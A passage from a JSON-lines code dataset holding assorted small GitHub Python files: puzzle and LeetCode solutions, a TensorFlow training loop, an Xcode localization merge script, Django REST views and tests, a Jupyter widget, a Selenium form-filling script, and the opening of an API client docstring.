range(3):\n potential += abs(self.p[axis])\n kinetic += abs(self.v[axis])\n return potential * kinetic\n\ndef invcmp(a, b):\n return (a < b) - (a > b)\n\n# Turn our input file into a set of (x,y) tuples\ninputfile = open(args.filename)\nmoons = set()\nfor line in inputfile:\n m = re.match('', line)\n if m is None:\n print(\"Failed to match line:\", line)\n exit(1)\n moon = Moon( int(m.group(1)), int(m.group(2)), int(m.group(3)) )\n moons.add(moon)\n\nfor steps in range(1, args.steps+1):\n # Calculate the acceleration due to gravity for each of our moons\n for moon in moons:\n for other in moons:\n if args.verbose:\n print(\"\\tConsidering effect on our moon at\", moon.p, \"of other moon at\", other.p)\n for axis in range(3):\n moon.v[axis] += invcmp(moon.p[axis], other.p[axis])\n\n for moon in moons:\n moon.step()\n\nprint(\"After\", steps, \"steps:\")\ntotalenergy = 0\nfor moon in moons:\n energy = moon.energy()\n print(\"Moon at\", moon.p, \"has energy\", energy)\n totalenergy += energy\n\nprint(\"Total energy:\", totalenergy)\n","repo_name":"davepage-mcr/aoc2019","sub_path":"day12/moon.py","file_name":"moon.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"785240348","text":"\"\"\"\n419. 
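The custom_composition format accepted by read_csv_composition is just a whitespace-separated table whose header mixes element symbols and isotope symbols, with the first data row (the photosphere) skipped. A hedged sketch of parsing such a table from an in-memory buffer; it assumes pandas accepts a file-like object in place of a filename and that pyne is installed for the symbol lookup:

from io import StringIO
from tardis.io.model_reader import read_csv_composition

table = StringIO(
    "Index C O Ni56\n"
    "0 1.0 1.0 1.0\n"      # photosphere row, dropped by skip_rows=[1]
    "1 0.4 0.3 0.3\n"
    "2 0.5 0.2 0.3\n"
    "3 0.6 0.1 0.3\n"
)

index, abundances, isotope_abundances = read_csv_composition(table)
# abundances is indexed by atomic number (C -> 6, O -> 8), one column per shell;
# isotope_abundances is indexed by (atomic_number, mass_number), here (28, 56) for Ni56.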
Battleships in a Board\nMedium\n\nGiven an m x n matrix board where each cell is a battleship 'X' or empty '.', return the number of the battleships on board.\n\nBattleships can only be placed horizontally or vertically on board. In other words, they can only be made of the shape 1 x k (1 row, k columns) or k x 1 (k rows, 1 column), where k can be of any size. At least one horizontal or vertical cell separates between two battleships (i.e., there are no adjacent battleships).\n\nExample 1:\n\nInput: board = [[\"X\",\".\",\".\",\"X\"],[\".\",\".\",\".\",\"X\"],[\".\",\".\",\".\",\"X\"]]\nOutput: 2\nExample 2:\n\nInput: board = [[\".\"]]\nOutput: 0\n\nConstraints:\n\nm == board.length\nn == board[i].length\n1 <= m, n <= 200\nboard[i][j] is either '.' or 'X'.\n\n\nFollow up: Could you do it in one-pass, using only O(1) extra memory and without modifying the values board?\n\"\"\"\n#5%\nclass Solution:\n def countBattleships(self, board: List[List[str]]) -> int:\n self.seen = []\n answer = 0\n\n def lookDown(pos):\n if pos[0] + 1 < len(board):\n self.seen.append([pos[0] + 1, pos[1]])\n if board[pos[0] + 1][pos[1]] == \"X\":\n lookDown([pos[0] + 1, pos[1]])\n\n def lookRight(pos):\n if pos[1] + 1 < len(board[0]):\n self.seen.append([pos[0], pos[1] + 1])\n if board[pos[0]][pos[1] + 1] == \"X\":\n lookRight([pos[0], pos[1] + 1])\n\n for i in range(len(board)):\n for j in range(len(board[0])):\n if [i, j] not in self.seen:\n self.seen.append([i, j])\n if board[i][j] == \"X\":\n answer += 1\n lookDown([i, j])\n lookRight([i, j])\n\n return answer\n\n\"\"\"\nsample 57 ms submission\nclass Solution:\n def countBattleships(self, board: List[List[str]]) -> int:\n def isHead(i, j):\n #return True/False\n if board[i][j] == 'X' and \\\n (i == 0 or board[i - 1][j] != 'X') and \\\n (j == 0 or board[i][j-1] != 'X'):\n return True\n \n return False\n \n R = len(board)\n C = len(board[0])\n bCount = 0\n for i in range(R):\n for j in range(C):\n if isHead(i, j):\n bCount += 1\n \n return bCount\n\"\"\"","repo_name":"jzman353/Leetcode","sub_path":"Array/2D/Battleships in a Board.py","file_name":"Battleships in a Board.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"43070431856","text":"# You are given a string s, which contains stars *.\n#\n# In one operation, you can:\n#\n# Choose a star in s.\n# Remove the closest non-star character to its left, as well as remove the star itself.\n# Return the string after all stars have been removed.\n#\n# Note:\n#\n# The input will be generated such that the operation is always possible.\n# It can be shown that the resulting string will always be unique.\n#\n# Example 1:\n# Input: s = \"leet**cod*e\"\n# Output: \"lecoe\"\n# Explanation: Performing the removals from left to right:\n# - The closest character to the 1st star is 't' in \"leet**cod*e\". s becomes \"lee*cod*e\".\n# - The closest character to the 2nd star is 'e' in \"lee*cod*e\". s becomes \"lecod*e\".\n# - The closest character to the 3rd star is 'd' in \"lecod*e\". 
s becomes \"lecoe\".\n# There are no more stars, so we return \"lecoe\".\n#\n# Example 2:\n# Input: s = \"erase*****\"\n# Output: \"\"\n# Explanation: The entire string is removed, so we return an empty string.\n#\n#\n# Constraints:\n# 1 <= s.length <= 105\n# s consists of lowercase English letters and stars *.\n# The operation above can be performed on s.\n\nfrom decorator import function_execution_time\n\nclass SolutionOne:\n @function_execution_time\n def removeStars(self, s: str) -> str:\n list_s = list(s)\n while \"*\" in list_s:\n for el in range(len(list_s)):\n if list_s[el] == \"*\":\n del list_s[el - 1:el + 1]\n break\n\n return ''.join(list_s)\n\n\nclass SolutionTwo:\n\n def delStar(self, _list: list) -> list:\n if '*' in _list:\n index = _list.index('*')\n del _list[index - 1:index + 1]\n self.delStar(_list)\n\n return _list\n\n @function_execution_time\n def removeStars(self, s: str) -> str:\n _list = list(s)\n\n self.delStar(_list)\n\n return ''.join(_list)\n\n\n\nif __name__ == '__main__':\n\n result = SolutionOne()\n print(result.removeStars(s=\"leet**cod*e\"*100))\n\n\n result = SolutionTwo()\n print(result.removeStars(s=\"leet**cod*e\"*100))\n","repo_name":"aidarhaertdinov/tasks_solution","sub_path":"task_27/removing_stars_from_a_string.py","file_name":"removing_stars_from_a_string.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71601709749","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 7 20:51:21 2019\n@author: Enyang\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nimport tFunctions as tFunc\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef model(X_train, Y_train, X_test, Y_test, X_vali, Y_vali, units_per_layer, learning_rate = 0.0001,\n num_epochs = 1500, minibatch_size = 32, print_cost = True):\n \"\"\"\n Implements a three-layer tensorflow neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SOFTMAX.\n \n Tensorflow will find the dependent operations and run them first if need.\t\n Your cost function uses Z3 as a parameter and you calculated Z3 with the forward_propagation function,\n so Tensorflow will run all these functions for you in the correct order.\n \n Arguments:\n X_train -- training set, of shape (input size = 12288, number of training examples = 1080)\n Y_train -- test set, of shape (output size = 6, number of training examples = 1080)\n X_test -- training set, of shape (input size = 12288, number of training examples = 120)\n Y_test -- test set, of shape (output size = 6, number of test examples = 120)\n learning_rate -- learning rate of the optimization\n num_epochs -- number of epochs of the optimization loop\n minibatch_size -- size of a minibatch\n print_cost -- True to print the cost every 100 epochs\n \n Returns:\n parameters -- parameters learnt by the model. 
They can then be used to predict.\n \"\"\"\n \n ops.reset_default_graph() # to be able to rerun the model without overwriting tf variables\n tf.set_random_seed(1) # to keep consistent results\n seed = 3 # to keep consistent results\n (n_x, m) = X_train.shape # (n_x: input size, m : number of examples in the train set)\n n_y = Y_train.shape[0] # n_y : output size\n costs = [] # To keep track of the cost\n \n # Create Placeholders of shape (n_x, n_y)\n X, Y = tFunc.create_placeholders(n_x, n_y)\n\n # Initialize parameters\n parameters = tFunc.initialize_parameters(units_per_layer)\n \n # Forward propagation: Build the forward propagation in the tensorflow graph\n z3 = tFunc.forward_propagation(X, parameters, units_per_layer)\n \n # Cost function: Add cost function to tensorflow graph\n cost = tFunc.compute_cost(z3, Y)\n \n # Backpropagation: Define the tensorflow optimizer. Use an AdamOptimizer.\n optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(cost)\n \n # Initialize all the variables\n init = tf.global_variables_initializer()\n\n # Start the session to compute the tensorflow graph\n with tf.Session() as sess:\n \n # Run the initialization\n sess.run(init)\n \n # Do the training loop\n for epoch in range(num_epochs):\n\n minibatch_cost = 0.\n num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set\n seed = seed + 1\n minibatches = tFunc.random_mini_batches(X_train, Y_train, minibatch_size, seed)\n\n for minibatch in minibatches:\n\n # Select a minibatch\n (minibatch_X, minibatch_Y) = minibatch\n \n # IMPORTANT: The line that runs the graph on a minibatch.\n # Run the session to execute the optimizer and the cost, the feedict should contain a minibatch for (X,Y).\n _ , temp_cost = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})\n \n minibatch_cost += temp_cost / num_minibatches\n\n # Print the cost every epoch\n if print_cost == True and epoch % 100 == 0:\n print (\"Cost after epoch %i: %f\" % (epoch, minibatch_cost))\n if print_cost == True and epoch % 5 == 0:\n costs.append(minibatch_cost)\n \n # plot the cost\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\n # lets save the parameters in a variable\n parameters = sess.run(parameters)\n print (\"Parameters have been trained!\")\n\n # Calculate the correct predictions\n # tf.argmax(z3) returns an array with the indexes of the biggest value within z3 tensor\n # Y is one-hot encoded, so it has one 1 and all other are zero. \n # pred represents probabilities of classes. \n # So argmax finds the positions of best prediction and correct value. 
\n # After that you check whether they are the same.\n # tf.equal returns a 1D array with 0's and 1's\n correct_prediction = tf.equal(tf.argmax(z3), tf.argmax(Y))\n\n # Calculate accuracy on the test set\n # By computing the mean of elements across dimensions of a tensor.\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\n print (\"Train Accuracy:\", accuracy.eval({X: X_train, Y: Y_train}))\n print (\"Validation Accuracy:\", accuracy.eval({X: X_vali, Y: Y_vali}))\n print (\"Test Accuracy:\", accuracy.eval({X: X_test, Y: Y_test}))\n \n return parameters\n\n","repo_name":"enyangxxx/tfFoodImageClassifier","sub_path":"tModel.py","file_name":"tModel.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"27062080406","text":"class Solution(object):\n def getHint(self, secret, guess):\n \"\"\"\n :type secret: str\n :type guess: str\n :rtype: str\n \"\"\"\n bull_num = 0\n cow_num = 0\n nums = [0] * 10\n for i in range(len(secret)):\n num = int(secret[i])\n nums[num] += 1\n for i in range(len(guess)):\n num = int(guess[i])\n if nums[num] > 0:\n cow_num += 1\n nums[num] -= 1\n if guess[i] == secret[i]:\n bull_num += 1\n cow_num -= 1\n return str(bull_num) + \"A\" + str(cow_num) + \"B\"\n","repo_name":"lstytld/LeetCode","sub_path":"201 - 300/299. Bulls and Cows.py","file_name":"299. Bulls and Cows.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"72649181109","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\"\"\"Update by merging .strings file(s) of an Xcode project.\"\"\"\n\nimport os\nimport sys\nimport shlex\nimport shutil\nimport tempfile\nimport re\nfrom string import Template\nfrom subprocess import Popen, PIPE\n\n__author__ = \"Ali Servet Donmez\"\n__email__ = \"asd@pittle.org\"\n__version__ = \"0.9.1\"\n\n# ==============================================================================\n# SETTINGS\n# ==============================================================================\n\nGENSTRING_SEARCH_PATHS = [\n]\n\"\"\"Recursive search paths where Objective-C source file(s) will be searched.\"\"\"\n\nBASE_LANG = 'en'\n\"\"\"Base localization language which will be overridden at all times.\"\"\"\n\nOTHER_LANGS = [\n]\n\"\"\"List of additional localization languages which will be updated.\"\"\"\n\nBASE_RESOURCES = ''\n\"\"\"Base resources directory which will be overridden at all times.\"\"\"\n\nOTHER_RESOURCES = [\n]\n\"\"\"List of additional resources that will be updated.\"\"\"\n\n# ==============================================================================\n# DO NOT TOUCH BELOW HERE\n# ==============================================================================\n\nclass LocalizedString():\n\n def __init__(self, key, value, comment=None):\n self.key = key\n self.value = value\n self.comment = comment\n self.todoc = False\n\n def __str__(self):\n return Template('/* $todoc$comment */\\n\"$key\" = \"$value\";').substitute(\n key=self.key,\n value=self.value,\n comment=self.comment or \"No comment provided by engineer.\",\n todoc='TODOC ' if self.todoc else '',\n )\n\n def __lt__(self, other):\n return self.key.lower() < other.key.lower()\n\ndef check_and_setup_settings():\n global OTHER_LANGS\n # Remove duplicate entries\n OTHER_LANGS = list(set(OTHER_LANGS))\n if BASE_LANG in OTHER_LANGS:\n sys.stderr.write(\"OTHER_LANGS must not include base language: 
%s.\\n\" % BASE_LANG)\n return False\n return True\n\ndef check_xcode_setup():\n for res in [BASE_RESOURCES] + OTHER_RESOURCES:\n for lang in [BASE_LANG] + OTHER_LANGS:\n lang_dirname = os.path.join(res, '%s.lproj' % lang)\n if not os.path.isdir(lang_dirname):\n sys.stderr.write('Missing directory: %s.\\n' % lang_dirname)\n return False\n return True\n\ndef genstrings(output_path):\n \"\"\"Recursively search current working directory for Objective-C source code\n file(s) and return output generated by internal genstrings utility for lines\n containing text of the form NSLocalizedString(\"key\", comment) or\n CFCopyLocalizedString(\"key\", comment).\n\n \"\"\"\n find_cmd = r\"find -E %s -iregex '.*\\.(h|m|mm)' -print0\" % ' '.join(GENSTRING_SEARCH_PATHS)\n genstrings_cmd = 'xargs -0 genstrings -o \"%s\"' % output_path\n\n try:\n p1 = Popen(shlex.split(find_cmd), stdout=PIPE)\n p2 = Popen(shlex.split(genstrings_cmd), stdin=p1.stdout, stdout=PIPE)\n p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.\n p2.communicate()\n except OSError:\n sys.stderr.write(\"Error (e.g., trying to execute a non-existent file).\\n\")\n sys.exit()\n except ValueError:\n sys.stderr.write(\"Invalid arguments.\\n\")\n sys.exit()\n\n with open(os.path.join(output_path, 'Localizable.strings'), 'r') as f:\n return f.read().decode('utf16').strip()\n\ndef parse_strings_file(data):\n \"\"\"Parse .strings file and return a list of LocalizedString objects.\n\n Keyword arguments:\n data -- .strings file content\n\n \"\"\"\n return [LocalizedString(*parse_localized_string(s)) for s in data.split('\\n\\n')]\n\nre_comment = re.compile(r'^/\\* (.*) \\*/$')\nre_l10n = re.compile(r'^\"(.+)\" = \"(.+)\";$')\n\ndef parse_localized_string(text):\n \"\"\"Parse text and return key, value and comment tuple.\n\n Keyword arguments:\n text -- localized strings text, leading and trailing characters will be removed if necessary.\n\n \"\"\"\n split = text.strip().split('\\n')\n\n if len(split) == 2:\n return re_l10n.match(split[1]).groups() + (re_comment.match(split[0]).groups()[0],)\n\ndef save_strings(strings, base_path):\n \"\"\"Write Localizable.strings to disk.\n\n Keyword arguments:\n strings -- list of LocalizedString objects.\n base_path -- where Localizable.strings file will be written.\n\n \"\"\"\n write_data = unicode()\n for s in strings:\n write_data += \"%s\\n\\n\" % unicode(s)\n with open(os.path.join(base_path, 'Localizable.strings'), 'wb') as f:\n f.write(write_data.encode('utf16'))\n\ndef merge_strings(base_strings, other_strings):\n \"\"\"Merge two list of localized strings.\n\n Keyword arguments:\n base_strings -- more up-to-date list of localized strings.\n other_strings -- previous list of localized strings.\n\n \"\"\"\n # Local copy of base_strings since we don't want to change it outside too\n merged = base_strings[:]\n for s in merged:\n s.todoc = True\n for i, base in enumerate(merged):\n for other in other_strings:\n if base.key == other.key:\n merged[i] = other\n return merged\n\ndef main():\n filename = os.path.split(__file__)[1]\n\n # Check if script is configured okay\n if not check_and_setup_settings():\n sys.stderr.write(\"%s: configuration error.\\n\" % filename)\n return os.EX_CONFIG\n\n # Check if Xcode project is setup ready for localizations to take place\n if not check_xcode_setup():\n sys.stderr.write(\"%s: project is not setup correctly.\\n\" % filename)\n return os.EX_CONFIG\n\n # All checks went well, here comes the good part...\n\n # Generate latest string table from source code\n 
dtemp_path = tempfile.mkdtemp()\n latest_strings = parse_strings_file(genstrings(dtemp_path))\n shutil.rmtree(dtemp_path)\n\n # Save base .strings file as it is by overwriting the old one\n save_strings(latest_strings, os.path.join(BASE_RESOURCES, '%s.lproj' % BASE_LANG))\n\n # For any other languages do the merge-magic and write to disk\n for lang in OTHER_LANGS:\n merged = None\n try:\n read_data = None\n with open(os.path.join(BASE_RESOURCES, '%s.lproj' % lang, 'Localizable.strings'), 'r') as f:\n read_data = f.read().decode('utf16')\n merged = merge_strings(latest_strings, parse_strings_file(read_data.strip()))\n except IOError:\n merged = latest_strings\n\n save_strings(sorted(merged), os.path.join(BASE_RESOURCES, '%s.lproj' % lang))\n\n # For all other languages for all other resources do the merge-magic and write to disk\n # FIXME This code block is almost identical to one above, wrap these two\n for res in OTHER_RESOURCES:\n for lang in [BASE_LANG] + OTHER_LANGS:\n read_data = None\n with open(os.path.join(res, '%s.lproj' % lang, 'Localizable.strings'), 'r') as f:\n read_data = f.read().decode('utf16')\n merged = merge_strings(latest_strings, parse_strings_file(read_data.strip()))\n save_strings(sorted(merged), os.path.join(res, '%s.lproj' % lang))\n\n return os.EX_OK\n\nif __name__ == '__main__':\n status = main()\n sys.exit(status)\n\n# End of file\n","repo_name":"gistable/gistable","sub_path":"all-gists/4130087/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":7228,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"94"} +{"seq_id":"13194361071","text":"import copy\n\nfrom django.contrib.auth import get_user_model\nfrom rest_framework.test import APIClient\n\nfrom . import objects_creator\nfrom .assertions import Assertions\nfrom .data import Data\n\n\ndef authentication(client, client_auth_data):\n token = client.post('/api/auth/token/login/', client_auth_data).data['auth_token']\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n\nclass SetDataClass(Assertions):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.tags = objects_creator.create_objects(\n creator=objects_creator.tag_creator,\n objects=Data.tags\n )\n cls.ingredients = objects_creator.create_objects(\n creator=objects_creator.ingredient_creator,\n objects=Data.ingredients\n )\n cls.users = copy.deepcopy(Data.users)\n\n def setUp(self):\n super().setUp()\n\n self.guest_client = APIClient()\n\n\nclass SetAuthUserData(SetDataClass):\n\n def setUp(self):\n super().setUp()\n\n self.auth_client = APIClient()\n self.auth_client_id = 0\n self.auth_client_data = self.users[self.auth_client_id]\n self.auth_client_auth_data = self.get_auth_data(self.auth_client_data)\n\n def get_user_response_data(self, user_id):\n response_data = self.users[user_id].copy()\n\n response_data.pop('password')\n response_data['id'] = user_id + 1\n response_data['is_subscribed'] = False\n\n return response_data\n\n def get_auth_data(self, user_data):\n auth_data = {\n 'email': user_data['email'],\n 'password': user_data['password']\n }\n return auth_data\n\n\nclass SetOneRecipeData(SetAuthUserData):\n\n def setUp(self):\n super().setUp()\n \n self.recipes = copy.deepcopy(Data.recipes)\n \n self.recipe_id = 0\n\n self.guest_client.post('/api/users/', self.auth_client_data)\n authentication(self.auth_client, self.auth_client_auth_data)\n self.author_data = self.get_user_response_data(self.auth_client_id)\n\n def get_recipe_response_data(self, recipe_id, 
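parse_localized_string expects a two-line block, a /* comment */ line followed by a "key" = "value"; line, and merge_strings keeps entries that were already translated while flagging new keys with a TODOC marker. A small illustration, assuming the definitions above are importable (for example with the gist saved as a module):

blocks = [
    '/* Title of the welcome screen */\n"WELCOME_TITLE" = "Welcome";',
    '/* Label of the OK button */\n"OK_BUTTON" = "OK";',
]
latest = [LocalizedString(*parse_localized_string(b)) for b in blocks]

# Pretend the existing catalogue only translated the title so far.
existing = [LocalizedString("WELCOME_TITLE", "Bienvenue", "Title of the welcome screen")]

for entry in merge_strings(latest, existing):
    print(entry)   # WELCOME_TITLE keeps "Bienvenue"; OK_BUTTON comes back marked TODOC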
author_response_data):\n response_data = self.recipes[recipe_id].copy()\n\n for ingredient in response_data['ingredients']:\n id = ingredient['id']\n ingredient.update(self.ingredients[id - 1])\n\n response_tags = []\n for tag_id in response_data['tags']:\n response_tags.append(self.tags[tag_id - 1])\n response_data['tags'] = response_tags\n\n response_data['id'] = recipe_id + 1\n response_data['is_favorited'] = False\n response_data['is_in_shopping_cart'] = False\n response_data['author'] = author_response_data\n response_data.pop('image')\n\n return response_data\n\n\nclass SetAllRecipesData(SetOneRecipeData):\n\n def setUp(self):\n super().setUp()\n\n self.second_auth_client = APIClient()\n self.second_auth_client_id = 1\n self.second_auth_client_data = self.users[\n self.second_auth_client_id\n ]\n\n self.second_auth_client_auth_data = (\n self.get_auth_data(self.second_auth_client_data)\n )\n self.guest_client.post('/api/users/', self.second_auth_client_data)\n authentication(\n self.second_auth_client, self.second_auth_client_auth_data\n )\n \n mid = len(self.recipes) // 2\n self.client_post_recipes(\n client=self.auth_client,\n range=range(0, mid),\n author_id=self.auth_client_id\n )\n self.client_post_recipes(\n client=self.second_auth_client,\n range=range(mid, len(self.recipes)),\n author_id=self.second_auth_client_id\n )\n\n def client_post_recipes(self, client, range, author_id):\n for recipe_id in range:\n self.recipes[recipe_id] = self.post_recipe(\n client, self.recipes[recipe_id], recipe_id, author_id\n )\n\n def post_recipe(self, client, recipe, recipe_id, author_id):\n client.post('/api/recipes/', recipe, format='json')\n author_response_data = self.get_user_response_data(author_id)\n recipe = self.get_recipe_response_data(recipe_id, author_response_data)\n return recipe\n","repo_name":"vbifaa/foodgram-project-react","sub_path":"backend/grocery_assistant/grocery_assistant/tests/data/set_data.py","file_name":"set_data.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24848613827","text":"from IPython.display import display, HTML\nimport ipywidgets as widgets\nfrom traitlets import Unicode, validate\nfrom base64 import decodestring\n\nclass FileWidget(widgets.DOMWidget):\n _view_name = Unicode('FileView').tag(sync=True)\n _view_module = Unicode('fileview').tag(sync=True)\n data_url = Unicode('').tag(sync=True)\n\ndisplay(HTML(\"\"))\n\ndef save_data_url(data_url, path):\n\tfile = open(path, \"wb\")\n\tstring = data_url.split(\",\")[1].encode()\n\tfile.write(decodestring(string))\n\tfile.close()\n\ndef changed_data(change):\n\tpath = \"data_url_image.jpg\"\n\tsave_data_url(change.new, path)\n\tprint(\"Saved image to path: {}\".format(path))\n\nfile_widget = FileWidget()\ndisplay(file_widget)\nfile_widget.observe(changed_data, names=[\"data_url\"])","repo_name":"wircho/JupyterWidgets","sub_path":"model_tester.py","file_name":"model_tester.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"33864651792","text":"from builtins import dict\n\nimport Aufgabe3\n\n\ndef ToBinear(zahl):\n listm = []\n print(f'le,{listm}')\n while zahl != 0:\n if (int(zahl) % 2 != 0):\n listm.append(1)\n\n print(f'2,{zahl}')\n if (int(zahl) < 1):\n zahl = 0\n break\n else:\n # print(f'le,{zahl}')\n if (int(zahl) < 1):\n zahl = 0\n break\n listm.append(0)\n\n zahl = int(zahl) / 2\n 
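The fixture classes above register users against djoser-style /api/auth/token/login/ and /api/users/ endpoints and attach the token with authentication(). A sketch of a concrete test built on SetAllRecipesData; it assumes the Assertions base ultimately derives from a Django/DRF test case, and the expected status codes are illustrative:

class RecipeListSmokeTest(SetAllRecipesData):
    def test_clients_can_list_recipes(self):
        # guest_client carries no token; auth_client logged in during setUp()
        self.assertEqual(self.auth_client.get("/api/recipes/").status_code, 200)
        self.assertEqual(self.guest_client.get("/api/recipes/").status_code, 200)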
print(f'0,{zahl}')\n listm.reverse()\n print(f'le,{listm}')\n\n\n#print(ToBinear(127))\nkey = dict({\"0\":0,\"1\": 1, \"2\": 2, \"3\":3, \"4\": 4, \"5\":5\n , \"6\": 6,\n \"7\": 7,\n \"8\": 8,\n \"9\": 9,\n \"A\": 10,\n \"B\": 11,\n \"C\": 12,\n \"D\": 13,\n \"E\": 14,\n \"F\": 15,\n\n })\n\n\ndef HExToDecimal(zahl,true):\n wert=0\n list=[]\n for i in zahl:\n list.append(i)\n lengh = len(list)-1\n for y in list:\n wert+=key[y]*(16**lengh)\n print(f'dsa,{lengh}{key[y]}')\n lengh = lengh - 1\n print(lengh)\n if(true):\n ToBinear(wert)\n\n print(wert)\n\n\nHExToDecimal(\"FC2\",True)","repo_name":"Aref19/MatheAufgabe","sub_path":"Aufgabe4.py","file_name":"Aufgabe4.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"16790890923","text":"from rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom .serializers import ReportSerializer, ReportDetailSerializer, ReportCreateSerializer\nfrom rest_framework.response import Response\nfrom django.db.models import Q\nfrom books.models import Report\nfrom drf_yasg.utils import swagger_auto_schema\n\n@swagger_auto_schema(method='post', request_body=ReportDetailSerializer)\n@api_view(('GET', 'POST'))\ndef report(request, user_id):\n if request.method == 'GET':\n '''\n 독후감 리스트 READ\n\n ---\n '''\n # .get()은 single object = not iterable\n # .filter() 는 QuerySet = iterable\n report_list = Report.objects.filter(user_id = user_id)\n # many = True : queryset이 여러 개의 아이템을 포함하고 있다.(리스트) 를 장고(DRF)에 알려줌\n serializer = ReportDetailSerializer(report_list, many = True)\n\n elif request.method == 'POST':\n '''\n 독후감 CREATE\n\n ---\n '''\n serializer = ReportCreateSerializer(data = request.data)\n # DRF(Django Rest Framework) 에서는 request에서 데이터를 받을 때\n # 반드시 is_valid() 여부를 체크해야 한다.\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status = status.HTTP_201_CREATED)\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\n return Response(serializer.data, status = status.HTTP_200_OK)\n\n@api_view(('GET', 'PUT', 'DELETE'))\ndef report_detail(request, user_id, book_isbn):\n '''\n 독후감 관련 RUD\n\n ---\n '''\n try:\n report = Report.objects.get(Q(user_id = user_id) & Q(book_isbn = book_isbn))\n except Report.DoesNotExist:\n return Response({\n 'code' : 404,\n 'message' : \"Report not found!\"\n }, status = status.HTTP_404_NOT_FOUND)\n if request.method == 'GET':\n serializer = ReportDetailSerializer(report)\n return Response(serializer.data, status = status.HTTP_200_OK)\n\n elif request.method == 'PUT':\n serializer = ReportCreateSerializer(report, data = request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\n\n elif request.method == 'DELETE':\n report.delete()\n # 삭제한 뒤에는 204 NO CONTENT를 리턴\n return Response(status = status.HTTP_204_NO_CONTENT)\n","repo_name":"sy9612/readme","sub_path":"backend/readme/reports/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"9302339973","text":"a=[12,34,5]\nb=a\nb.remove(5)\nprint(a)\nprint(b)\nprint(a is b)\n\na = input(\"What is your name\")\nif a=='10':\n raise TypeError(\"Numbers are not allowed\")\n\nprint(f\"Hello {a}\")","repo_name":"ShadAhmed122/Public","sub_path":"python practice/v8/Raise and 
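ToBinear above drifts into float division and extra break conditions inside the halving loop, and HExToDecimal accumulates digit values against descending powers of 16. A tighter restatement of the same hex to decimal to binary pipeline, offered as a standalone sketch rather than a patch of the original file:

HEX_DIGITS = "0123456789ABCDEF"

def hex_to_decimal(text):
    value = 0
    for ch in text.upper():
        value = value * 16 + HEX_DIGITS.index(ch)
    return value

def to_binary(n):
    if n == 0:
        return "0"
    bits = []
    while n:
        bits.append(str(n % 2))
        n //= 2                      # integer division keeps everything exact
    return "".join(reversed(bits))

assert hex_to_decimal("FC2") == 4034
assert to_binary(hex_to_decimal("FC2")) == "111111000010"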
referance.py","file_name":"Raise and referance.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74225453419","text":"#특정 사이트의 텍스트 iframe으로 되어 있는 에디터에 글쓰기\n\nfrom selenium import webdriver\nimport time as tt\nimport random\nfrom datetime import date\nfrom datetime import time\nfrom datetime import datetime\n\n#셋업\ndriver = webdriver.Chrome(\"D:\\selenium\\chromedriver.exe\")\ndriver.set_page_load_timeout(30)\n\n#접속한다.\ndriver.get(\"특정사이트\")\ndriver.implicitly_wait(30)\n\n#입력하기 클릭\ndriver.find_element_by_id(\"Button2\").click()\n\ntt.sleep(3)\n\n#알림창 취소 버튼 누름\nalert = driver.switch_to_alert()\nalert.dismiss()\n\ntt.sleep(3)\n\n\n#에디터 찾아, hello 입력\ndriver.switch_to_frame(0)\ndriver.switch_to_frame(driver.find_element_by_tag_name(\"iframe\"))\ndriver.find_element_by_xpath(\"/html/body\").send_keys(\"hello\")\n\ntt.sleep(3)\t\n\n#종료\ndriver.quit()\n\n\n\n\n","repo_name":"janghyeonan/WEB_Selenium_Python","sub_path":"WEB_Editer_Find_Text_input.py","file_name":"WEB_Editer_Find_Text_input.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40270929835","text":"\"\"\"\nte_api\n A Python client side utility for using Threat Emulation API calls to an appliance.\n You may either set the global variables below (some or all), or assigning their optional\n arguments when running the 